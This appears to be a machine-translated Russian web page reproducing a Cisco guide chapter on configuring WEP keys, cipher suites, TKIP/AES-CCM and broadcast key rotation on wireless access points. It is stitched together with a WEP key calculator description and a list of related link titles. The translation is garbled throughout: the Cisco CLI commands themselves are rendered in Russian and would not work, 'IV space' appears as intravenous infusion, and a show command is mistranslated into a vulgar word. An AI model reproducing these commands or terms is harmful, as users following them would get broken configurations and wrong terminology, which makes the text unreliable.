Руководство по настройке беспроводной точки доступа Cisco ISR и HWIC — Настройка типов шифрования [Маршрутизаторы с интегрированными сервисами Cisco серии 1800]
Настройка типов шифрования
В этой главе описывается, как настроить типы шифрования, необходимые для использования аутентифицированного управления ключами WPA, WEP, AES-CCM, протокола целостности временного ключа (TKIP) и поворота широковещательного ключа.Эта глава содержит следующие разделы:
• Понимание типов шифрования
• Настройка типов шифрования
Понять типы шифрования
В этом разделе описывается, как типы шифрования защищают трафик в вашей беспроводной локальной сети.
Точно так же, как любой, находящийся в пределах радиуса действия радиостанции, может настраиваться на частоту радиостанции и прослушивать сигнал, так и любое беспроводное сетевое устройство в зоне действия точки доступа может принимать радиопередачи точки доступа.Поскольку шифрование является первой линией защиты от злоумышленников, Cisco рекомендует использовать полное шифрование в беспроводной сети.
Одним из типов беспроводного шифрования является Wired Equivalent Privacy (WEP). WEP-шифрование скремблирует связь между точкой доступа и клиентскими устройствами, чтобы сохранить связь частной. Как точка доступа, так и клиентские устройства используют один и тот же ключ WEP для шифрования и дешифрования радиосигналов. Ключи WEP шифруют как одноадресные, так и многоадресные сообщения.Одноадресные сообщения адресованы только одному устройству в сети. Многоадресные сообщения адресованы нескольким устройствам в сети.
Аутентификация по протоколу EAP, также называемая аутентификацией 802.1x, обеспечивает динамические ключи WEP для пользователей беспроводных сетей. Динамические ключи WEP более безопасны, чем статические или неизменные ключи WEP. Если злоумышленник пассивно получает достаточно пакетов, зашифрованных одним и тем же ключом WEP, он может выполнить вычисление, чтобы узнать ключ и использовать его для подключения к вашей сети.Поскольку они часто меняются, динамические ключи WEP не позволяют злоумышленникам выполнять вычисления и изучать ключ. См. Главу 6 «Настройка типов аутентификации» для получения подробной информации о EAP и других типах аутентификации.
Комплекты шифров
— это наборы алгоритмов шифрования и целостности, разработанные для защиты радиосвязи в беспроводной сети. Вы должны использовать комплект шифров для включения защищенного доступа Wi-Fi (WPA). Поскольку наборы шифров обеспечивают защиту WEP, а также позволяют использовать управление ключами с проверкой подлинности, Cisco рекомендует включить шифрование с помощью команды шифрования режима шифрования в CLI или с помощью раскрывающегося меню шифра в интерфейсе веб-браузера.Наборы шифров, содержащие AES-CCM, обеспечивают наилучшую защиту вашей беспроводной локальной сети, а наборы шифров, содержащие только WEP, наименее безопасны.
Эти функции безопасности защищают трафик данных в беспроводной локальной сети:
• AES-CCMP — на основе усовершенствованного стандарта шифрования (AES), определенного в публикации FIPS 197 Национального института стандартов и технологий, AES-CCMP представляет собой симметричный блочный шифр, который может шифровать и дешифровать данные с использованием ключей 128, 192, и 256 бит.AES-CCMP превосходит WEP-шифрование и определяется стандартом IEEE 802.11i.
• WEP — WEP — это алгоритм шифрования стандарта 802.11, изначально разработанный для обеспечения вашей беспроводной локальной сети того же уровня конфиденциальности, что и в проводной локальной сети. Однако базовая конструкция WEP имеет недостатки, и злоумышленник может скомпрометировать конфиденциальность с разумными усилиями.
• TKIP (протокол целостности временного ключа) — TKIP — это набор алгоритмов, окружающих WEP, который предназначен для достижения наилучшей возможной безопасности на устаревшем оборудовании, построенном для работы WEP.TKIP добавляет четыре улучшения в WEP:
— Функция смешивания ключей для каждого пакета для защиты от атак с использованием слабых ключей
— Новая дисциплина секвенирования IV для обнаружения повторных атак
— Криптографическая проверка целостности сообщений (MIC), называемая Майклом, для обнаружения подделок, таких как переворачивание битов и изменение источника и назначения пакета
— Расширение пространства для внутривенного вливания, чтобы практически исключить необходимость повторного набора
• Вращение ключа широковещания (также известное как обновление ключа группы) — Вращение ключа широковещания позволяет точке доступа генерировать наилучший из возможных случайный ключ группы и периодически обновлять всех клиентов, способных к управлению ключами.Защищенный доступ Wi-Fi (WPA) также предоставляет дополнительные параметры для обновления ключей группы. Подробнее о WPA см. В разделе «Использование управления ключами WPA» на стр. 6–6.

Примечание Клиентские устройства, использующие статический WEP, не могут использовать точку доступа при включении поворота ключа вещания. При включении поворота ключа широковещания только точки доступа беспроводных клиентов, использующие аутентификацию 802.1x (например, LEAP, EAP-TLS или PEAP), могут использовать точку доступа.
Настройка типов шифрования
В этих разделах описывается, как настроить шифрование, например WEP, AES-CCM и поворот ключа трансляции:
• Создание ключей WEP
• Создание Cipher Suites
• Включение и отключение поворота ключа трансляции

Примечание Все типы шифрования по умолчанию отключены.
Создание ключей WEP

Примечание Статические ключи WEP необходимо настраивать только в том случае, если вашей точке доступа требуется поддержка клиентских устройств, использующих статический WEP. Если все клиентские устройства, которые связаны с точкой доступа, используют управление ключами (аутентификация WPA или 802.1x), вам не нужно настраивать статические ключи WEP.
Начиная в привилегированном режиме EXEC, выполните следующие действия, чтобы создать ключ WEP и задать свойства ключа:
команда Цель
Шаг 1
настроить терминал
Войдите в режим глобальной конфигурации.
Шаг 2
интерфейс dot11radio {0 | 1}
Войдите в режим конфигурации интерфейса для радиоинтерфейса. Радио 2,4 ГГц — это радио 0, а радио 5 ГГц — это радио 1.
Шаг 3
шифрование
[vlan vlan-id]
ключ 1-4
размер {40 | 128} ключ шифрования
[0 | 7]
[ключ передачи]
Создайте ключ WEP и настройте его свойства.
• (необязательно) Выберите VLAN, для которой вы хотите создать ключ.
• Назовите слот ключа, в котором находится этот ключ WEP. Вы можете назначить до 4 ключей WEP для каждой VLAN.
• Введите ключ и установите размер ключа, 40-битный или 128-битный. 40-битные ключи содержат 10 шестнадцатеричных цифр; 128-битные ключи содержат 26 шестнадцатеричных цифр.
• (необязательно) Укажите, является ли ключ зашифрованным (7) или незашифрованным (0).
• (необязательно) Установите этот ключ в качестве ключа передачи.Ключ в слоте 1 является ключом передачи по умолчанию.
Примечание Использование функций безопасности, таких как управление ключами с проверкой подлинности, может ограничивать конфигурации ключей WEP. См. Раздел «Ограничения ключа WEP» для получения списка функций, которые влияют на ключи WEP.
Шаг 4
конец
Возврат в привилегированный режим EXEC.
Шаг 5
копировать run-config startup-config
(Необязательно) Сохраните свои записи в файле конфигурации.
В этом примере показано, как создать 128-битный ключ WEP в слоте 3 для VLAN 22 и установить ключ в качестве ключа передачи:
роутер # настроить терминал
Маршрутизатор
(config) # интерфейс dot11radio 0
роутер (config-if) # шифрование vlan 22 ключ 3 размер 128 1234567845678456 приемо-ключ
Маршрутизатор
(config-ssid) # end
WEP Ключевые ограничения
В таблице 5-1 перечислены ограничения ключа WEP в зависимости от конфигурации безопасности.
Таблица 5-1 Основные ограничения WEP
Конфигурация безопасности WEP ключ ограничение
Управление ключами с проверкой подлинности WPA
Невозможно настроить ключ WEP в слоте ключей 1
LEAP или EAP аутентификация
Невозможно настроить ключ WEP в слоте ключа 4
Набор шифров с 40-битным WEP
Невозможно настроить 128-битный ключ
Набор шифров с 128-битным WEP
Невозможно настроить 40-битный ключ
Набор шифров с TKIP
Невозможно настроить ключи WEP
Набор шифров с TKIP и 40-битным WEP или 128-битным WEP
Невозможно настроить ключ WEP в слотах ключей 1 и 4
Вращение ключа трансляции
Ключи в слотах 2 и 3 перезаписываются вращающимися широковещательными ключами
Примечание Клиентские устройства, использующие статический WEP, не могут использовать точку доступа при включении поворота широковещательных ключей.При включении поворота ключа широковещания только точки доступа беспроводных клиентов, использующие аутентификацию 802.1x (например, LEAP, EAP-TLS или PEAP), могут использовать точку доступа.

Пример настройки WEP-ключа
В таблице 5-2 показан пример настройки ключа WEP, которая будет работать для точки доступа и связанного с ней устройства:
Таблица 5-2 Пример настройки WEP-ключа
Слот для ключей Точка доступа Ассоциированное устройство
Передача? Ключевые Содержание Передача? Ключевые Содержание
1
x
12345678
4567890abcdef
—
12345678
4567890abcdef
2
—
09876543210987654321fedcba
x
09876543210987654321fedcba
3
—
не установлено
—
не установлено
4
—
не установлено
—
FEDCBA09876543211234567890

Поскольку ключ WEP 1 точки доступа выбран в качестве ключа передачи, ключ WEP 1 на другом устройстве должен иметь такое же содержимое.Ключ WEP 4 на другом устройстве установлен, но поскольку он не выбран в качестве ключа передачи, ключ WEP 4 на точке доступа вообще не требуется устанавливать.
Создание Cipher Suites
Начиная в привилегированном режиме EXEC, выполните следующие шаги для создания набора шифров:
команда Цель
Шаг 1
настроить терминал
Войдите в режим глобальной конфигурации.
Шаг 2
интерфейс dot11radio {0 | 1}
Войдите в режим конфигурации интерфейса для радиоинтерфейса. Радио 2,4 ГГц — это радио 0, а радио 5 ГГц — это радио 1.
Шаг 3
шифрование
[vlan vlan-id]
шифры режима
{[aes-ccm | tkip]} {[wep128 | wep40]}
Включите комплект шифров, содержащий необходимое шифрование.В таблице 5-3 перечислены рекомендации по выбору набора шифров, который соответствует настроенному вами типу управления ключами с проверкой подлинности.
• (необязательно) Выберите VLAN, для которой вы хотите включить функции WEP и WEP.
• Установите параметры шифрования и уровень WEP. Вы можете комбинировать TKIP со 128-битным или 40-битным WEP.
Примечание Вы также можете использовать команду wep режима шифрования для настройки статического WEP. Однако вы должны использовать режим шифрования wep, только если ни один клиент, связанный с точкой доступа, не способен управлять ключами.См. Справочник команд Cisco IOS для точек доступа и мостов Cisco для подробного описания команды wep режима шифрования.
Примечание При настройке шифра TKIP и AES-CCM (не TKIP + WEP 128 или TKIP + WEP 40) для SSID SSID должен использовать управление ключами WPA. Сбой аутентификации клиента на SSID, который использует шифр TKIP без включения управления ключами WPA.
Шаг 4
конец
Возврат в привилегированный режим EXEC.
Шаг 5
копировать run-config startup-config
(Необязательно) Сохраните свои записи в файле конфигурации.
Используйте форму no команды шифрования, чтобы отключить набор шифров.
В этом примере устанавливается набор шифров для VLAN 22, который включает AES-CCM и 128-битный WEP.
роутер # настроить терминал
Маршрутизатор
(config) # интерфейс dot11radio 0
Роутер
(config-if) # шифрование в режиме vlan 22 шифры aes-ccm wep128
Маршрутизатор
(config-if) # выход
Cipher Suites Совместим с WPA
Если вы настраиваете свою точку доступа для использования аутентифицированного управления ключами WPA, вы должны выбрать набор шифров, совместимый с типом управления аутентифицированными ключами.В таблице 5-3 перечислены комплекты шифров, совместимые с WPA.
Таблица 5-3 Наборы шифров, совместимые с WPA
Аутентифицированные типы управления ключами Совместимые комплекты шифров
WPA
• шифры в режиме шифрования aes-ccm
• шифры в режиме шифрования aes-ccm wep128
• шифры в режиме шифры aes-ccm wep40
• шифры в режиме шифрования режим шифрования
aes-ccm шифрование
aes-ccm tkip wep128
• шифры в режиме шифрования aes-ccm tkip wep128 wep40
• шифры в режиме шифрования tkip wep128 wep40

Примечание При настройке только шифрования AES-CCM, TKIP или шифрования TKIP AES-CCM + TKIP (не включая WEP 40 или WEP 128) на радиоинтерфейсе или VLAN, каждый SSID на этом радио или VLAN должен быть установлен для использования управления ключами WPA.Если вы настраиваете AES-CCM или TKIP на радио или VLAN, но не настраиваете управление ключами на SSID, аутентификация клиента на SSID не выполняется.
Полное описание WPA и инструкции по настройке управления ключами с проверкой подлинности см. В разделе «Использование управления ключами WPA» на стр. 6-6.
Включение и отключение поворота ключа трансляции
Вращение клавиш трансляции по умолчанию отключено.

Примечание Клиентские устройства, использующие статический WEP, не могут использовать точку доступа при включении поворота ключа вещания.При включении поворота ключа широковещания только точки доступа беспроводных клиентов, использующие аутентификацию 802.1x (например, LEAP, EAP-TLS или PEAP), могут использовать точку доступа.
Начиная в привилегированном режиме EXEC, выполните следующие шаги, чтобы включить поворот ключа трансляции:
команда Цель
Шаг 1
настроить терминал
Войдите в режим глобальной конфигурации.
Шаг 2
интерфейс dot11radio {0 | 1}
Войдите в режим конфигурации интерфейса для радиоинтерфейса. Радио 2,4 ГГц — это радио 0, а радио 5 ГГц — это радио 1.
Шаг 3
широковещательный ключ
секунд изменения
[vlan vlan-id]
[прекращение членства]
[изменение возможностей]
Включить поворот ключа трансляции.
• Введите количество секунд между каждым поворотом широковещательной клавиши.
• (необязательно) Введите VLAN, для которой вы хотите включить поворот широковещательного ключа.
• (Необязательно) Если вы включите управление ключами с проверкой подлинности WPA, вы можете включить дополнительные обстоятельства, при которых точка доступа изменяет и распространяет групповой ключ WPA.
— Прекращение членства — точка доступа генерирует и распространяет новый групповой ключ, когда любое аутентифицированное клиентское устройство отсоединяется от точки доступа.Эта функция защищает конфиденциальность группового ключа для связанных клиентов. Однако это может привести к дополнительным расходам, если клиенты в вашей сети часто перемещаются.
— Изменение возможностей — точка доступа генерирует и распределяет динамический групповой ключ, когда отсоединяется последний клиент управления без ключа (статический WEP), и распространяет статически настроенный ключ WEP при первом управлении без ключа (статический WEP) клиент аутентифицируется В режиме миграции WPA эта функция значительно повышает безопасность клиентов с поддержкой управления ключами, когда к точке доступа не подключены клиенты со статическим WEP.
См. Главу 6 «Настройка типов аутентификации» для получения подробных инструкций по включению аутентифицированного управления ключами.
Шаг 4
конец
Возврат в привилегированный режим EXEC.
Шаг 5
копировать run-config startup-config
(Необязательно) Сохраните свои записи в файле конфигурации.
Используйте форму no команды шифрования, чтобы отключить поворот ключа трансляции.
В этом примере включается поворот ключа широковещания в VLAN 22 и устанавливается интервал вращения 300 секунд:
роутер # настроить терминал
Маршрутизатор
(config) # интерфейс dot11radio 0
routerrouter (config-if) # широковещательный ключ vlan 22 change 300
Маршрутизатор
(config-ssid) # end

Тип безопасности в режиме универсального клиента
Безопасность
В режиме универсального клиента тип безопасности должен быть настроен точно так же, как и для точки доступа, с которой он связан.Например, если точка доступа настроена с шифрованием AES и TKIP, универсальный клиент также должен иметь AES + TKIP, чтобы устройства правильно связывались.
• TKIP
• AES
• TKIP + AES
• WEP 40-битный
• WEP 128-битный
Универсальная клиентская конфигурация
!
dot11 ssid test10
аутентификация открыта
аутентификация ключей управления wpa
wpa-psk ascii 7 11584B5643475D5B5C737B
!
!
интерфейс Dot11Radio0 / 1/0
IP-адрес DHCP
!
шифрует режим шифрования aes-ccm
!
ssid test10
!
Скорость
базовая-1.0 Basic-2.0 Basic-5.5 6,0 9,0 Basic-11,0 12,0 18,0 24,0 36,0 48,0 54,0
Роль станции без полномочий root
!
Конец

Точка доступа настроена с шифрованием AES + TKIP WPA-PSK. Универсальный клиент отобразит следующее системное сообщение, если во время сопоставления между точкой доступа и универсальным клиентом существует несоответствие типов шифрования:
% DOT11-4-CANT_ASSOC: интерфейс Dot11Radio0 / 1/0, не может ассоциироваться: недопустимая многоадресная рассылка WPAIE сюита exp = 0x0050F204 act = 0x0050F202
В этом примере универсальный клиент будет иметь пакет многоадресной рассылки 0x0050F204 (для TKIP), но вместо этого получит пакет многоадресной рассылки 0x0050F202 (для AES + TKIP).Вот разные сценарии:
• Если универсальный клиент настроен для AES WPAv2 (режим шифрования шифрует aes-ccm), точка доступа должна быть настроена для AES WPAv2. Универсальный клиент будет ассоциироваться с шифрованием AES.
• Если универсальный клиент настроен для TKIP (режим шифрования шифров tkip) Точка доступа должна быть настроена для 1. TKIP WPA или 2. TKIP + AES. Универсальный клиент будет ассоциироваться с шифрованием TKIP.
• Если универсальный клиент настроен для AES + TKIP (режим шифрования шифрует tkip aes) Точка доступа должна быть настроена для TKIP + AES. Универсальный клиент будет ассоциироваться с шифрованием AES.
• Если точка доступа настроена для AES WPAv2 WPAv2 (шифрование в режиме шифрования aes-ccm), а универсальный клиент настроен на TKIP + AES (шифрование в режиме шифрования aes-ccm tkip), вы получите системное сообщение с указанием многоадресный пакет не найден.
% DOT11-4-CANT_ASSOC: интерфейс Dot11Radio0 / 1/0, не может быть связан: WPAIE не найден и обязательный
Отладка
Чтобы определить, связан ли универсальный клиент с точкой доступа, пользователь может выполнить команду «show dot11 association all» для подробного вывода, с какой точкой доступа он ассоциировался и как он связался с точкой доступа.
Команда «show dot11 association» будет иметь следующий вывод:

c2801_uc #
c2801_uc # sh dot11 задница все
Адрес: 0015.2b06.17d0 Имя: ap
IP-адрес: 200.1.1.1 Интерфейс: Dot11Radio0 / 1/0
Устройство: ap1200-Parent Версия программного обеспечения: 12.3
CCX Версия: НЕТ

Штат: Assoc Родитель: Наш Родитель
SSID: test10 VLAN: 0
Переходов к Инфра: 0 Идентификатор Ассоциации: 1
Туннельный Адрес: 0.0.0.0
Тип ключа: НЕТ Шифрование: Выкл.
Текущий рейтинг: 54.0 Возможность: WMM ShortHdr ShortSlot
Поддерживаемые тарифы: 1,0 2,0 5,5 6,0 9,0 11,0 12,0 18,0 24,0 36,0 48,0 54,0
Сила сигнала: -14 дБм Подключено на: 236 секунд
Качество сигнала: нет Время ожидания действия: 15 секунд
Энергосбережение: Выкл. Последняя активность: 0 секунд назад

входных пакетов: 2449 выходных пакетов: 15
байт: 451711 байт: 4664
Дубликаты Rcvd: 3 Повторить данные: 1
Ошибка расшифровки: 0 попыток RTS: 0
MIC Failed: 0 MIC Отсутствует: 0
Перенаправлено пакетов: 0 Перенаправлено Фильтровано: 0

c2801_uc #

Предостережения
Когда Cisco dot11radio находится в режиме универсального клиента и связывается со сторонней точкой доступа, существуют некоторые дополнительные предупреждения.Первый находится на выходе «show dot11 association». В области «Устройство» отображается результат «неизвестно» при подключении к сторонней точке доступа (не Cisco). В приведенном ниже примере универсальный клиент Cisco 876W связан с точкой доступа Symbol 4131. Поля «Версия программного обеспечения» и «Имя» также приводят к «НЕТ». Это связано с тем, что сообщения Cisco Aironet между устройствами Cisco передают эту информацию, а не между сторонними устройствами и устройствами Cisco.
Пример:
c876 # sh dot11 assoc

802.11 клиентских станций на Dot11Radio0:

SSID [символ]:

MAC-адрес IP-адрес Имя устройства Родительское состояние
00a0.f8dc.133a 192.168.1.4 неизвестно - - Ассо

c876 # sh dot11 задница все
Адрес: 00a0.f8dc.133a Имя: НЕТ
IP-адрес: 192.168.1.4 Интерфейс: Dot11Radio0
Устройство: неизвестно Версия программного обеспечения: НЕТ
CCX Версия: НЕТ

Штат: Assoc Родитель: Наш Родитель
SSID: символ VLAN: 0
Переходов к Infra: -1 Id ассоциации: 2
Туннельный Адрес: 0.0.0.0
Тип ключа: НЕТ Шифрование: WEP
Текущий рейтинг: 11.0
Поддерживаемые тарифы: 1.0 2.0 5.5 11.0
Сила сигнала: -55 дБм Подключено на: 39 секунд
Качество сигнала: нет Время ожидания действия: 15 секунд
Энергосбережение: Выкл. Последняя активность: 13 секунд назад

входных пакетов: 408 выходных пакетов: 16
байт: 46619 байт: 3495
Дубликаты Rcvd: 2 Повторить данные: 8
Ошибка расшифровки: 0 попыток RTS: 0
MIC Failed: 0 MIC Отсутствует: 0
Перенаправлено пакетов: 0 Перенаправлено Фильтровано: 0

с876 #
,
WEP — Беспроводной калькулятор ключей шифрования
Этот калькулятор требует использования Javascript с поддержкой и поддержкой браузеров. Этот скрипт вычисляет компьютер, созданный случайным образом Ключ WEP , используемый в приложениях WI-FI , а также в других схемах шифрования. Как и в случае с большей частью компьютерной индустрии, TANS влияет на технологию WI-FI и 802.11 .Методология, которую один производитель использует для шифрования WEP, не является универсальной. Некоторые используют 24-битный внутренний ключ для запуска шифрования. Глубина возможного шифрования также варьируется. Мы постарались охватить (на момент написания этой статьи) все известные возможности глубины шифрования, вплоть до 8-битных и 256-битных. Например, если ваш WAP допускает 64-битное шифрование, вы можете или не сможете использовать ПОЛНОСТЬЮ 64 бит. Если этот производитель использует 24-битный внутренний триггерный ключ, вы можете использовать только 40-битную запись.Это технически называется 64-битное шифрование BASE. Для многих глубин шифрования мы предлагаем как полный, так и базовый выбор. Выберите количество символов в пуле символов ASCII. Выбор значения по умолчанию Максимум дает пул всех букв верхнего и нижнего регистра, цифр и специальных символов ASCII, таких как $, # и т. Д., Всего 95 возможностей. Выбор минимума, как требуют некоторые производители, ограничивает пул только прописными и строчными буквами и цифрами, 62 вариантами.Затем выберите длину ключа бита для расчета и нажмите соответствующую кнопку в полном или базовом виде; сгенерированный ключ ASCII или HEX можно затем скопировать в буфер обмена вручную, выполнив операцию вырезания и вставки или нажав соответствующую кнопку «Копировать в буфер обмена» справа от поля «Вычисленный ключ». Если вы являетесь пользователем продукта MAC или Apple, вам нужно будет добавить «$» в начало созданной строки. Восстановление нового или другого ключа очистит все предыдущие значения. Также следует учитывать, что глубина шифрования оказывает определенное влияние на пропускную способность данных.Чем больше глубина шифрования; меньшее значение пропускной способности. В ситуациях, когда проблемы со скоростью не важны, или в сетях с низким трафиком, фактическая видимость ухудшения может никогда не проявиться. Деградация наиболее распространена в горячих точках общественного доступа. Смотрите наш WI-FI Hot Spot Locator .
Вы также можете рассчитать пользовательский ключ WEP на основе выбранной вами фразы или другого текстового ввода. Введите текст ASCII или строку, которую вы хотите использовать в качестве ключа. В этом поле принимаются все допустимые символы, независимо от того, какие кнопки находятся в верхней части автоматического калькулятора.Отображается количество символов, и после нажатия кнопки «Рассчитать пользовательский ключ» будут показаны ключи генерации ASCII и HEX.
Posted in Разное

	команда	Цель
Шаг 1	настроить терминал	Войдите в режим глобальной конфигурации.
Шаг 2	интерфейс dot11radio {0 \| 1}	Войдите в режим конфигурации интерфейса для радиоинтерфейса. Радио 2,4 ГГц — это радио 0, а радио 5 ГГц — это радио 1.
Шаг 3	шифрование [vlan vlan-id] ключ 1-4 размер {40 \| 128} ключ шифрования [0 \| 7] [ключ передачи]	Создайте ключ WEP и настройте его свойства. • (необязательно) Выберите VLAN, для которой вы хотите создать ключ. • Назовите слот ключа, в котором находится этот ключ WEP. Вы можете назначить до 4 ключей WEP для каждой VLAN. • Введите ключ и установите размер ключа, 40-битный или 128-битный. 40-битные ключи содержат 10 шестнадцатеричных цифр; 128-битные ключи содержат 26 шестнадцатеричных цифр. • (необязательно) Укажите, является ли ключ зашифрованным (7) или незашифрованным (0). • (необязательно) Установите этот ключ в качестве ключа передачи.Ключ в слоте 1 является ключом передачи по умолчанию. Примечание Использование функций безопасности, таких как управление ключами с проверкой подлинности, может ограничивать конфигурации ключей WEP. См. Раздел «Ограничения ключа WEP» для получения списка функций, которые влияют на ключи WEP.
Шаг 4	конец	Возврат в привилегированный режим EXEC.
Шаг 5	копировать run-config startup-config	(Необязательно) Сохраните свои записи в файле конфигурации.

Конфигурация безопасности	WEP ключ ограничение
Управление ключами с проверкой подлинности WPA	Невозможно настроить ключ WEP в слоте ключей 1
LEAP или EAP аутентификация	Невозможно настроить ключ WEP в слоте ключа 4
Набор шифров с 40-битным WEP	Невозможно настроить 128-битный ключ
Набор шифров с 128-битным WEP	Невозможно настроить 40-битный ключ
Набор шифров с TKIP	Невозможно настроить ключи WEP
Набор шифров с TKIP и 40-битным WEP или 128-битным WEP	Невозможно настроить ключ WEP в слотах ключей 1 и 4
Вращение ключа трансляции	Ключи в слотах 2 и 3 перезаписываются вращающимися широковещательными ключами Примечание Клиентские устройства, использующие статический WEP, не могут использовать точку доступа при включении поворота широковещательных ключей.При включении поворота ключа широковещания только точки доступа беспроводных клиентов, использующие аутентификацию 802.1x (например, LEAP, EAP-TLS или PEAP), могут использовать точку доступа.

Слот для ключей	Точка доступа		Ассоциированное устройство
Слот для ключей	Передача?	Ключевые Содержание	Передача?	Ключевые Содержание
1	x	12345678	4567890abcdef	—	12345678	4567890abcdef
2	—	09876543210987654321fedcba	x	09876543210987654321fedcba
3	—	не установлено	—	не установлено
4	—	не установлено	—	FEDCBA09876543211234567890

Как взломать Wi-Fi сеть с WEP шифрованием

Программы

WEP шифрование в Wi-Fi сетях

Введение

Технология WEP

Механизм шифрования WEP

Алгоритм инициализации RC4

Особенности WEP-протокола

Потоковое шифрование

Блочное шифрование

Вектор инициализации

Слабые места WEP шифрования и примеры атак

Атака Фларера-Мантина-Шамира

Атака KoreK

Атака Тевса-Вайнмана-Пышкина

Технологии безопасности беспроводных сетей

Механизм шифрования WEP

Потоковое шифрование

Развертывание инфраструктуры Microsoft / МГУПИ User Group

Наша команда

Требования

Конвенции

Точки доступа Aironet с операционной системой VxWorks

VxWorks Настройки

точек доступа Aironet, на которых установлено программное обеспечение Cisco IOS

VxWorks Настройки

Набор ключей WEP

Включить WEP

Настройки

s37wep.mif

Настройка типов шифрования

Понять типы шифрования

Настройка типов шифрования

Создание ключей WEP

WEP Ключевые ограничения

Пример настройки WEP-ключа

Создание Cipher Suites

Cipher Suites Совместим с WPA

Включение и отключение поворота ключа трансляции

Тип безопасности в режиме универсального клиента

Универсальная клиентская конфигурация

WEP — Беспроводной калькулятор ключей шифрования

Добавить комментарий Отменить ответ